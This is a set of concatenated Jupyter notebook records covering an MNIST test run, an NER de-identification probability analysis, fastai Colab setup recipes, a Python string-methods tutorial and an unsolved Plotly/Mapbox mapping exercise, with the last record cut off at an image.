"Test Loss: 0.052876\n\nTest Accuracy of 0: 99% (972/980)\nTest Accuracy of 1: 99% (1127/1135)\nTest Accuracy of 2: 98% (1012/1032)\nTest Accuracy of 3: 98% (992/1010)\nTest Accuracy of 4: 98% (968/982)\nTest Accuracy of 5: 98% (875/892)\nTest Accuracy of 6: 98% (946/958)\nTest Accuracy of 7: 98% (1010/1028)\nTest Accuracy of 8: 97% (949/974)\nTest Accuracy of 9: 98% (990/1009)\n\nTest Accuracy (Overall): 98% (9841/10000)\n"
]
],
[
[
"### Visualize Sample Test Results\n\nThis cell displays test images and their labels in this format: `predicted (ground-truth)`. The text will be green for accurately classified examples and red for incorrect predictions.",
"_____no_output_____"
]
],
[
[
"# obtain one batch of test images\ndataiter = iter(test_loader)\nimages, labels = dataiter.next()\n\n# get sample outputs\noutput = model(images)\n# convert output probabilities to predicted class\n_, preds = torch.max(output, 1)\n# prep images for display\nimages = images.numpy()\n\n# plot the images in the batch, along with predicted and true labels\nfig = plt.figure(figsize=(25, 4))\nfor idx in np.arange(20):\n ax = fig.add_subplot(2, 20/2, idx+1, xticks=[], yticks=[])\n ax.imshow(np.squeeze(images[idx]), cmap='gray')\n ax.set_title(\"{} ({})\".format(str(preds[idx].item()), str(labels[idx].item())),\n color=(\"green\" if preds[idx]==labels[idx] else \"red\"))",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2cb2a22a1d3005d42b8bf2377ccda216e0b4cc | 294,862 | ipynb | Jupyter Notebook | Notebooks/Specific difference in probability.ipynb | cliffordlab/DeId | 4a39269a5dd5d247cd9130212de7d55dbf620e00 | [
"MIT"
] | null | null | null | Notebooks/Specific difference in probability.ipynb | cliffordlab/DeId | 4a39269a5dd5d247cd9130212de7d55dbf620e00 | [
"MIT"
] | null | null | null | Notebooks/Specific difference in probability.ipynb | cliffordlab/DeId | 4a39269a5dd5d247cd9130212de7d55dbf620e00 | [
"MIT"
] | null | null | null | 129.155497 | 78,556 | 0.790265 | [
[
[
"%matplotlib inline\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy import stats\nimport statsmodels as stm\nfrom os import walk",
"_____no_output_____"
],
[
"sns.set(rc={'figure.figsize':(14.7,8.27)})",
"_____no_output_____"
],
[
"OxA00=np.load(\"NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag00/Mr1mainSalmanUnary_scorestest.npy\")\nOxC00=np.load(\"NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag00/Mr1mainSalmanCCCtest.npy\")\n#Dic00 = np.load(\"/home/salman/NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag00/FinalDict.npy\").item()\nwith open(\"/home/salman/NeuroNER-master/data/Speedi/MyTrain385SeparateRepFlag00/test_spacy.txt\", 'r') as file :\n TokFil00 = file.read().split('\\n\\n')\nOxC00.shape,OxA00.shape",
"_____no_output_____"
],
[
"OxA02=np.load(\"NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag02/NAMEMr1mainSalmanUnary_scorestest.npy\")\nOxC02=np.load(\"NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag02/NAMEMr1mainSalmanCCCtest.npy\")\nDic02 = np.load(\"/home/salman/NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag02/NAMEFinalDict02.npy\").item()\nwith open(\"/home/salman/NeuroNER-master/data/Speedi/MyTrain385SeparateRepFlag02/NAMEtest_spacy.txt\", 'r') as file :\n TokFil02 = file.read().split('\\n\\n')\nOxC02.shape,OxA02.shape",
"_____no_output_____"
],
[
"OxA01=np.load(\"NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag01/NAMEMr1mainSalmanUnary_scorestest.npy\")\nOxC01=np.load(\"NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag01/NAMEMr1mainSalmanCCCtest.npy\")\nDic01 = np.load(\"/home/salman/NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag01/NAMEFinalDict01.npy\").item()\nwith open(\"/home/salman/NeuroNER-master/data/Speedi/MyTrain385SeparateRepFlag01/NAMEtest_spacy.txt\", 'r') as file :\n TokFil01 = file.read().split('\\n\\n')\nOxC01.shape,OxA01.shape",
"_____no_output_____"
],
[
"filenames = np.load(\"/home/salman/NeuroNER-master/src/SalmanTest/filenames.npy\")",
"_____no_output_____"
],
[
"def CleanDic(Dic):\n NDic={}\n for i in filenames:\n if len(Dic[i[:-4]])>=1:\n NDic[\"%s\"%i[:-4]] = Dic[i[:-4]]\n return(NDic)",
"_____no_output_____"
],
[
"#NDic00 = CleanDic(Dic00)\nNDic01 = CleanDic(Dic01)\n#NDic02 = CleanDic(Dic02)\n#NDic11 = CleanDic(Dic11)\n#NDic22 = CleanDic(Dic22)",
"_____no_output_____"
],
[
"DirectoryPath=\"/home/salman/NeuroNER-master/data/Speedi/test/MyTrain385SeparateRepFlag01/\"\n(_, _, RealFilesNames) = next(walk(\"%s\"%DirectoryPath))\nRealFilesNames=[i[:-4] for i in RealFilesNames]",
"_____no_output_____"
],
[
"def findBreaks(oxc,limit=300):\n breaks=[]\n for i,c in enumerate(oxc):\n if len(c)>limit:\n breaks.append(i)\n return(breaks)",
"_____no_output_____"
],
[
"#C00breaks = findBreaks(OxC00)\nC01breaks = findBreaks(OxC01)\n#C02breaks = findBreaks(OxC02)\n#C11breaks = findBreaks(OxC11)\n#C22breaks = findBreaks(OxC22)",
"_____no_output_____"
],
[
"len(C00breaks),len(C02breaks),len(C01breaks)",
"_____no_output_____"
],
[
"msk=np.array([15, 38, 61, 85])",
"_____no_output_____"
],
[
"oldfile = 0\nfile = 0\nProb00max = []\nProb00sum = []\nSN=1\nfor file in range(len(RealFilesNames)):\n insideline = 0\n if len(NDic02[RealFilesNames[file]][insideline][SN]) != 0:\n for i in np.arange(oldfile,C00breaks[file]):\n for m,j in enumerate((TokFil00[i].split('\\n'))):\n for splittt in (j.split(\" \")[0].split(\"^\")):\n if (len(NDic02[RealFilesNames[file]][insideline][SN]) != 0 and \\\n len(NDic02[RealFilesNames[file]][insideline][SN][1]) != 0 and \\\n (NDic02[RealFilesNames[file]][insideline][SN][0]) in splittt):\n try:\n TEST=TokFil00[i].split('\\n')[m-1].split(\" \")[:2]\n except:\n TEST=TokFil00[i].split('\\n')[m+1].split(\" \")[:2]\n Prob00max.append((((np.exp((np.max(OxA00[i][m][msk])))/(np.sum((np.exp(OxA00[i][m])))))),\\\n i,file,insideline,j.split(\" \")[:2],m,TEST))\n Prob00sum.append((np.sum((np.exp(OxA00[i][m][msk])))/(np.sum((np.exp(OxA00[i][m]))))))\n if insideline < len(NDic02[RealFilesNames[file]]) - 1:\n insideline = insideline + 1\n else:\n if insideline < len(NDic02[RealFilesNames[file]]) - 1:\n insideline = insideline + 1\n oldfile = C00breaks[file] + 1",
"_____no_output_____"
],
[
"oldfile = 0\nfile = 0\nProb02max = []\nProb02sum = []\nSN=1\nfor file in range(len(RealFilesNames)):\n insideline = 0\n if len(NDic02[RealFilesNames[file]][insideline][SN]) != 0:\n for i in np.arange(oldfile,C02breaks[file]):\n for m,j in enumerate((TokFil02[i].split('\\n'))):\n for splittt in (j.split(\" \")[0].split(\"^\")):\n if (len(NDic02[RealFilesNames[file]][insideline][SN]) != 0 and \\\n len(NDic02[RealFilesNames[file]][insideline][SN][1]) != 0 and \\\n ((NDic02[RealFilesNames[file]][insideline][SN][1]) in splittt)):\n try:\n TEST=TokFil02[i].split('\\n')[m-1].split(\" \")[:2]\n except:\n TEST=TokFil02[i].split('\\n')[m+1].split(\" \")[:2]\n Prob02max.append((((np.exp((np.max(OxA02[i][m][msk])))/(np.sum((np.exp(OxA02[i][m])))))),\\\n i,file,insideline,j.split(\" \")[:2],m,TEST))\n Prob02sum.append((np.sum((np.exp(OxA02[i][m][msk])))/(np.sum((np.exp(OxA02[i][m]))))))\n if insideline < len(NDic02[RealFilesNames[file]]) - 1:\n insideline = insideline + 1\n else:\n if insideline < len(NDic02[RealFilesNames[file]]) - 1:\n insideline = insideline + 1\n oldfile = C02breaks[file] + 1",
"_____no_output_____"
],
[
"oldfile = 0\nfile = 0\nProb01max = []\nProb01sum = []\nSN=1\nfor file in range(len(RealFilesNames)):\n insideline = 0\n if len(NDic01[RealFilesNames[file]][insideline][SN]) != 0:\n for i in np.arange(oldfile,C01breaks[file]):\n for m,j in enumerate((TokFil01[i].split('\\n'))):\n for splittt in (j.split(\" \")[0].split(\"^\")):\n if (len(NDic01[RealFilesNames[file]][insideline][SN]) != 0 and \\\n len(NDic01[RealFilesNames[file]][insideline][SN][1]) != 0 and \\\n ((NDic01[RealFilesNames[file]][insideline][SN][1] in splittt))):\n Prob01max.append((((np.exp((np.max(OxA01[i][m][msk])))/(np.sum((np.exp(OxA01[i][m])))))),\\\n i,file,insideline,j.split(\" \")[:2],m,TEST))\n Prob01sum.append((np.sum((np.exp(OxA01[i][m][msk])))/(np.sum((np.exp(OxA01[i][m]))))))\n if insideline < len(NDic01[RealFilesNames[file]]) - 1:\n insideline = insideline + 1\n else:\n if insideline < len(NDic01[RealFilesNames[file]]) - 1:\n insideline = insideline + 1\n oldfile = C01breaks[file] + 1",
"_____no_output_____"
],
[
"NDic01[\"227-01\"][0][SN][1]",
"_____no_output_____"
],
[
"TokFil01[1481].split('\\n')",
"_____no_output_____"
],
[
"len(Prob00sum),len(Prob02sum),len(Prob01sum)",
"_____no_output_____"
],
[
"Dic01[\"227-03\"]",
"_____no_output_____"
],
[
"Prob01max[29]",
"_____no_output_____"
],
[
"Prob00max[30]",
"_____no_output_____"
],
[
"len(NDic02[RealFilesNames[file]][insideline][SN][1])",
"_____no_output_____"
],
[
"Dic02[\"308-01\"]",
"_____no_output_____"
],
[
"Prob02max",
"_____no_output_____"
],
[
"TEST=0\nfor i in RealFilesNames:\n for j in NDic02[i]:\n if len(j[SN])!=0:\n TEST=TEST+1",
"_____no_output_____"
],
[
"TEST",
"_____no_output_____"
],
[
"NDic02[\"221-03\"]:\n ",
"_____no_output_____"
],
[
"len(Prob00sum),len(Prob02sum)",
"_____no_output_____"
],
[
"for i in np.arange(730):\n if Prob00max[i][4][1]!=Prob02max[i][4][1]:\n print(i)\n break",
"_____no_output_____"
],
[
"# This was done because of Dr. name(first entry) and Patient name where the same and made the confussion.\ndel Prob00max[313]\ndel Prob00sum[313]",
"_____no_output_____"
],
[
"len(Prob00sum),len(Prob02sum)",
"_____no_output_____"
],
[
"for i in np.arange(730):\n if Prob00max[i][4][1]!=Prob02max[i][4][1]:\n print(i)\n break",
"355\n"
],
[
"# This is because of the wrong labeling of data!\ndel Prob00max[355]\ndel Prob00sum[355]\ndel Prob00max[354]\ndel Prob00sum[354]\ndel Prob00max[353]\ndel Prob00sum[353]",
"_____no_output_____"
],
[
"len(Prob00sum),len(Prob02sum)",
"_____no_output_____"
],
[
"for i in np.arange(730):\n if Prob00max[i][4][1]!=Prob02max[i][4][1]:\n print(i)\n break",
"389\n"
],
[
"# This was done because of Dr. name and Patient name where the same and made the confussion.\ndel Prob00max[389]\ndel Prob00sum[389]",
"_____no_output_____"
],
[
"len(Prob00sum),len(Prob02sum)",
"_____no_output_____"
],
[
"for i in np.arange(730):\n if Prob00max[i][4][1]!=Prob02max[i][4][1]:\n print(i)\n break",
"465\n"
],
[
"# This was done because of Dr. name and Patient name where the same and made the confussion.\ndel Prob00max[466]\ndel Prob00sum[466]\ndel Prob00max[465]\ndel Prob00sum[465]",
"_____no_output_____"
],
[
"len(Prob00sum),len(Prob02sum)",
"_____no_output_____"
],
[
"for i in np.arange(730):\n if Prob00max[i][4][1]!=Prob02max[i][4][1]:\n print(i)\n break",
"_____no_output_____"
],
[
"TotProbMax00 = [i[0] for i in Prob00max]\nTotProbMax01 = [i[0] for i in Prob01max]\nTotProbMax02 = [i[0] for i in Prob02max]\n",
"_____no_output_____"
],
[
"sns.set_style('darkgrid')\nsns.distplot(TotProbMax00,label=\"SN unchanged MAX\",norm_hist=True)#,bins=100)\nsns.distplot(TotProbMax01,label=\"SN random from inside MAX\",norm_hist=True)#,bins=100)\nsns.distplot(TotProbMax02,label=\"SN random from outside MAX\",norm_hist=True)#,bins=100)\n#sns.distplot(Prob00sum,label=\"GN & SN unchanged sum\",norm_hist=True)\n#sns.distplot(Prob01sum,label=\"SN random from inside sum\",norm_hist=True)\n#sns.distplot(Prob02sum,label=\"SN random from outside sum\",norm_hist=True)\nplt.legend()",
"_____no_output_____"
],
[
"sns.set_style('darkgrid')\nsns.distplot(np.array(TotProbMax00),label=\"SN unchanged MAX\",\\\n hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))\nsns.distplot(TotProbMax01,label=\"SN random from inside MAX\",\\\n hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))\nsns.distplot(TotProbMax02,label=\"SN random from outside MAX\",\\\n hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))\nsns.distplot(Prob00sum,label=\"SN unchanged sum\",\\\n hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))\nsns.distplot(Prob01sum,label=\"SN random from inside sum\",\\\n hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))\nsns.distplot(Prob02sum,label=\"SN random from outside sum\",\\\n hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))\nplt.legend()",
"_____no_output_____"
],
[
"sns.set_style('darkgrid')\nsns.distplot(1 - np.array(TotProbMax00),label=\"SN unchanged MAX\",\\\n hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))\nsns.distplot(1 - np.array(TotProbMax01),label=\"SN random from inside MAX\",\\\n hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))\nsns.distplot(1 - np.array(TotProbMax02),label=\"SN random from outside MAX\",\\\n hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))\nsns.distplot(1 - np.array(Prob00sum),label=\"SN unchanged sum\",\\\n hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))\nsns.distplot(1 - np.array(Prob01sum),label=\"SN random from inside sum\",\\\n hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))\nsns.distplot(1 - np.array(Prob02sum),label=\"SN random from outside sum\",\\\n hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))\nplt.legend()",
"_____no_output_____"
],
[
"OxC00[3]",
"_____no_output_____"
],
[
"file=2\ninsideline=0\nGN=0\nSN=1\nNDic02[RealFilesNames[file]]#[insideline][SN]",
"_____no_output_____"
],
[
"for i in np.arange(C00breaks[file-1]+1,C00breaks[file]):\n for m,j in enumerate((TokFil00[i].split('\\n'))):\n if (j.split(\" \")[0] == NDic02[RealFilesNames[file]][insideline][SN][0]):\n print((np.sum((np.exp(OxA00[i][m][msk]))/(np.sum((np.exp(OxA00[i][m])))))))\n if insideline < len(NDic02[RealFilesNames[file]]) - 1:\n insideline = insideline + 1",
"0.965844\n0.99738544\n"
],
[
"for n,i in enumerate(np.arange(C00breaks[file-1]+1,C00breaks[file])):\n for m,j in enumerate((TokFil00[i].split('\\n'))):\n if (j.split(\" \")[0] == NDic02[RealFilesNames[file]][insideline][SN][0]):\n print((np.exp(np.max(OxA00[i][m][msk])))/(np.sum((np.exp(OxA00[i][m])))))\n if insideline < len(NDic02[RealFilesNames[file]]) - 1:\n insideline = insideline + 1",
"0.94309056\n0.9879421\n"
],
[
"for n,i in enumerate(np.arange(C00breaks[file-1]+1,C00breaks[file])):\n for m,j in enumerate((TokFil00[i].split('\\n'))):\n if (j.split(\" \")[0] == NDic02[RealFilesNames[file]][insideline][SN][0]):\n print((np.exp(np.max(OxA00[i][m][msk])))/(np.sum((np.exp(OxA00[i][m])))))",
"0.94309056\n0.9879421\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2cb90f40d4e2a027e9c801d12568a90b41e345 | 5,191 | ipynb | Jupyter Notebook | nbs/01_platforms.colab.ipynb | lgvaz/fastcook2 | 3f50640189bc3630e70bcec5445cf84b4b0ce6f6 | [
"Apache-2.0"
] | 11 | 2020-03-24T19:13:45.000Z | 2021-08-25T16:42:41.000Z | nbs/01_platforms.colab.ipynb | lgvaz/fastcook2 | 3f50640189bc3630e70bcec5445cf84b4b0ce6f6 | [
"Apache-2.0"
] | 12 | 2020-03-24T18:11:49.000Z | 2022-02-26T06:56:18.000Z | nbs/01_platforms.colab.ipynb | lgvaz/fastcook2 | 3f50640189bc3630e70bcec5445cf84b4b0ce6f6 | [
"Apache-2.0"
] | null | null | null | 21.450413 | 214 | 0.547293 | [
[
[
"<a href=\"https://colab.research.google.com/github/lgvaz/fastcook/blob/master/colab.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
]
],
[
[
"#default_exp platforms.colab",
"_____no_output_____"
]
],
[
[
"# Colab\n> Useful recipes for your general colab workflow (not restricted to fastai).",
"_____no_output_____"
],
[
"## Check you have a gpu",
"_____no_output_____"
]
],
[
[
"!nvidia-smi",
"_____no_output_____"
]
],
[
[
"## Install required dependencies",
"_____no_output_____"
],
[
"For a stable version:",
"_____no_output_____"
]
],
[
[
"!pip install -q fastai2",
"_____no_output_____"
]
],
[
[
"For a bleeding edge install:",
"_____no_output_____"
]
],
[
[
"!pip install -q git+git://github.com/fastai/fastcore.git\n!pip install -q git+git://github.com/fastai/fastai2.git",
"_____no_output_____"
]
],
[
[
"If you are often switching from local to colab:",
"_____no_output_____"
]
],
[
[
"try:\n import fastai2\nexcept ImportError:\n !pip install -q git+git://github.com/fastai/fastcore.git\n !pip install -q git+git://github.com/fastai/fastai2.git",
"_____no_output_____"
]
],
[
[
"## Required imports",
"_____no_output_____"
],
[
"We are just using `Path` from fastai here, if you don't want to install fastai you can instead do `from pathlib import Path`.",
"_____no_output_____"
]
],
[
[
"from fastai2.basics import *",
"_____no_output_____"
]
],
[
[
"## Connect to drive\nConnects to your google drive and mounts it as a local folder. \nThe mounted folder supports any operations that a local folder supports. ",
"_____no_output_____"
]
],
[
[
"from google.colab import drive\ndrive.mount('/content/gdrive', force_remount=True)\nroot_dir = Path('/content/gdrive/My Drive/')",
"_____no_output_____"
]
],
[
[
"If you are constantly switching between colab and your local machine:",
"_____no_output_____"
]
],
[
[
"try:\n from google.colab import drive\n drive.mount('/content/gdrive', force_remount=True)\n root_dir = Path('/content/gdrive/My Drive/dl')\nexcept ImportError:\n root_dir = Path.home()/'dl'\nroot_dir.mkdir(exist_ok=True)",
"_____no_output_____"
]
],
[
[
"## Prevent colab from disconnecting\nKeep colab connected by repeatedly clicking on connect button. \nCopy and paste the snippet on your browser console (`ctrl+shift+i` for Windows/Linux, `command+option+i` for MacOS)",
"_____no_output_____"
],
[
"```javascript\nfunction ClickConnect(){\n console.log(\"Clicked on connect button\"); \n document.querySelector(\"colab-connect-button\").click()\n}\nsetInterval(ClickConnect,60000)\n```",
"_____no_output_____"
],
[
"## Upload files\nColab UI can be buggy, use this for uploading files.",
"_____no_output_____"
]
],
[
[
"from google.colab import files\nfiles.upload()",
"_____no_output_____"
]
],
[
[
"## Download stuff",
"_____no_output_____"
],
[
"If you have a direct link to the download, you can generally use `wget` to download it.",
"_____no_output_____"
]
],
[
[
"!wget http://images.cocodataset.org/zips/unlabeled2017.zip -P data",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
]
] |
cb2cbbf415e5ba9d92d7e3b9162a9cf730e97b1c | 7,196 | ipynb | Jupyter Notebook | notebooks/Python3-Language/02-Python Basics/05-String Functions.ipynb | binakot/Python3-Course | c555fc7376c45f4b2dedb6d57363c0070831c1e1 | [
"MIT"
] | null | null | null | notebooks/Python3-Language/02-Python Basics/05-String Functions.ipynb | binakot/Python3-Course | c555fc7376c45f4b2dedb6d57363c0070831c1e1 | [
"MIT"
] | null | null | null | notebooks/Python3-Language/02-Python Basics/05-String Functions.ipynb | binakot/Python3-Course | c555fc7376c45f4b2dedb6d57363c0070831c1e1 | [
"MIT"
] | null | null | null | 16.657407 | 47 | 0.427738 | [
[
[
"Len and Count",
"_____no_output_____"
]
],
[
[
"x=\"hello, my name is Elias\"",
"_____no_output_____"
],
[
"len(x)",
"_____no_output_____"
],
[
"x[len(x)-1]",
"_____no_output_____"
],
[
"x.count('l')",
"_____no_output_____"
]
],
[
[
"Casing",
"_____no_output_____"
]
],
[
[
"x.capitalize()",
"_____no_output_____"
],
[
"upper_cased=x.upper()\nprint(upper_cased)",
"HELLO, MY NAME IS ELIAS\n"
],
[
"lower_cased=upper_cased.lower()\nprint(lower_cased)",
"hello, my name is elias\n"
],
[
"print(upper_cased.isupper())\nprint(lower_cased.islower())\nprint(x.isupper())\nprint(x.islower())",
"True\nTrue\nFalse\nFalse\n"
],
[
"print(x.find('l'))\nprint(x.find('l', 5))\nprint(x.find('l', 5, 10))\nprint(x.find('m', 7, 15))\nprint(x.find('m', 8, 15))",
"2\n19\n-1\n7\n12\n"
]
],
[
[
"Is Functions",
"_____no_output_____"
]
],
[
[
"print('123abc'.isalnum())\nprint('123abc!'.isalnum())",
"True\nFalse\n"
],
[
"print('123abc'.isalpha())\nprint('abc'.isalpha())",
"False\nTrue\n"
]
],
[
[
"Checking on emptyness",
"_____no_output_____"
]
],
[
[
"print(\" \".isspace())\nprint(\"\".isspace())",
"True\nFalse\n"
],
[
"print(\"\" == \"\")\nprint(\" \".strip(' ') == \"\")",
"True\nTrue\n"
],
[
"s = \"\"\nif not s:\n print(\"empty string\")",
"empty string\n"
],
[
"h = \"hello\"\nprint(h.startswith(\"he\"))\nprint(h.endswith(\"lo\"))",
"True\nTrue\n"
]
],
[
[
"Splitting and Partitioning",
"_____no_output_____"
]
],
[
[
"split = h.split('l')\nprint(type(split))\nprint(split)\nsplit = h.split('e')\nprint(split)",
"<class 'list'>\n['he', '', 'o']\n['h', 'llo']\n"
],
[
"sentence = \"12;10;8;10\"\nsentence.split(';')",
"_____no_output_____"
],
[
"string = \"Python is fun\"\n\n# 'is' separator is found\nprint(string.partition('is '))\n\n# 'not' separator is not found\nprint(string.partition('not '))\n\nstring = \"Python is fun, isn't it\"\n\n# splits at first occurence of 'is'\nprint(string.partition('is'))",
"('Python ', 'is ', 'fun')\n('Python is fun', '', '')\n('Python ', 'is', \" fun, isn't it\")\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb2cc0ddbc6dd621d829b9cc7bc6f2a635d68116 | 5,829 | ipynb | Jupyter Notebook | class_work/06-Data-Visualization-with-PyViz-Day2-Solved/03-Stu_Cartographers_Expedition/Unsolved/cartographers_expedition.ipynb | MuayThaiLegz/Module_06 | 7fe05d68b064761c99438d21e786892c4eebe2c3 | [
"BSD-4-Clause-UC"
] | null | null | null | class_work/06-Data-Visualization-with-PyViz-Day2-Solved/03-Stu_Cartographers_Expedition/Unsolved/cartographers_expedition.ipynb | MuayThaiLegz/Module_06 | 7fe05d68b064761c99438d21e786892c4eebe2c3 | [
"BSD-4-Clause-UC"
] | null | null | null | class_work/06-Data-Visualization-with-PyViz-Day2-Solved/03-Stu_Cartographers_Expedition/Unsolved/cartographers_expedition.ipynb | MuayThaiLegz/Module_06 | 7fe05d68b064761c99438d21e786892c4eebe2c3 | [
"BSD-4-Clause-UC"
] | null | null | null | 25.343478 | 278 | 0.581232 | [
[
[
"# A Cartographers Expedition",
"_____no_output_____"
],
[
"You and your friends have decided to tackle NYC old school! No cell phones or GPS devices allowed. Although everyone is a bit nervous, you realize that using an actual map might be pretty cool.\n\nYour goal is to generate a map that plots your between five and six locations in the city. Plotly Express and Mapbox should be used to plot the route (point A to point B to point C) for the expedition.",
"_____no_output_____"
],
[
"## Import the required libraries and dependencies",
"_____no_output_____"
]
],
[
[
"import pandas as pd\nimport plotly.express as px\nimport os\nfrom pathlib import Path\nfrom dotenv import load_dotenv",
"_____no_output_____"
]
],
[
[
"## Step 1: Create a .env file to hold your Mapbox API Access Token",
"_____no_output_____"
],
[
"## Step 2: Read in the Mapbox API access token using the `os.getenv` function. Use the function provided to confirm that the token is available for use in the program. Finally, set your Mapbox API access token as the parameter in the `px.set_mapbox_access_token` function.",
"_____no_output_____"
]
],
[
[
"# Set up API credentials\n# Read the Mapbox API access token\n# YOUR CODE HERE\n\n# Confirm that the mapbox_api_access_token is available\nif not mapbox_api_access_token:\n print(\"Error with the Mapbox API access token. Check the .env file.\")\n",
"_____no_output_____"
],
[
"# Set the Mapbox API access token\n# YOUR CODE HERE",
"_____no_output_____"
]
],
[
[
"## Step 3: Read in the `nyc_excursion_plans.csv` file in to a Pandas DataFrame. Drop any rows that contain missing data or NaN values.",
"_____no_output_____"
]
],
[
[
"# Read the the ny_places_interest.csv file into a DataFrame\nplaces_of_interest = # YOUR CODE HERE\n\n# Review the DataFrame\n# YOUR CODE HERE\n",
"_____no_output_____"
]
],
[
[
"## Step 4: Slice the DataFrame to include the arrive airport and first location",
"_____no_output_____"
]
],
[
[
"# Create a DataFrame with the arriving Airport and the first location you will visit\narrival_and_first_location = # YOUR CODE HERE\n\n# Plot the arriving airport and the first location\nfirst_route = # YOUR CODE HERE\n\n\n# Show the plot\n# YOUR CODE HERE",
"_____no_output_____"
]
],
[
[
"## Step 5: Plot the route between your first, second and thrid locations.",
"_____no_output_____"
]
],
[
[
"# Plot the route between the first second and third locations\nfirst_second_third_locations = # YOUR CODE HERE\n\n# Create the plot including your first, second and third locations\nsecond_route = # YOUR CODE HERE\n\n# Show the Plot\n# YOUR CODE HERE\n",
"_____no_output_____"
]
],
[
[
"## Step 6: Plot the route between your third, fourth, and fifth locations.",
"_____no_output_____"
]
],
[
[
"## Step 5: Plot the route between your third, fourth, and fifth locations.\nthird_fourth_fifth_locations = # YOUR CODE HERE\n\n# Create the plot including your third, fourth and fifth locations\nthird_route = # YOUR CODE HERE\n\n# Show the Plot\n# YOUR CODE HERE\n",
"_____no_output_____"
]
],
[
[
"## Step 7: Plot all the stops in your excursion",
"_____no_output_____"
]
],
[
[
"# Plot course for all of the stops in your excursion, including the airport\nall_stops = # YOUR CODE HERE\n\n# Create the plot that shows all of you stops\nplot_all_stops = # YOUR CODE HERE\n\n# Show the Plot\n# YOUR CODE HERE\n",
"_____no_output_____"
]
],
[
[
"**Question** Given the location of the stops on your excursion, what is the order in which you should visit them to get you back to the airport most efficiently?\n\n**Answer** # YOUR ANSWER HERE",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb2cca1f0ed71f51eeaf15dfd021be8e9b1460fe | 732,931 | ipynb | Jupyter Notebook | Project_MCMC.ipynb | aafaquerk/ASTR513_Project | 610cc46728cd94cf723e046d575dcab57c4b1a99 | [
"CC0-1.0"
] | null | null | null | Project_MCMC.ipynb | aafaquerk/ASTR513_Project | 610cc46728cd94cf723e046d575dcab57c4b1a99 | [
"CC0-1.0"
] | null | null | null | Project_MCMC.ipynb | aafaquerk/ASTR513_Project | 610cc46728cd94cf723e046d575dcab57c4b1a99 | [
"CC0-1.0"
] | null | null | null | 2,187.853731 | 384,489 | 0.683838 | [
[
[
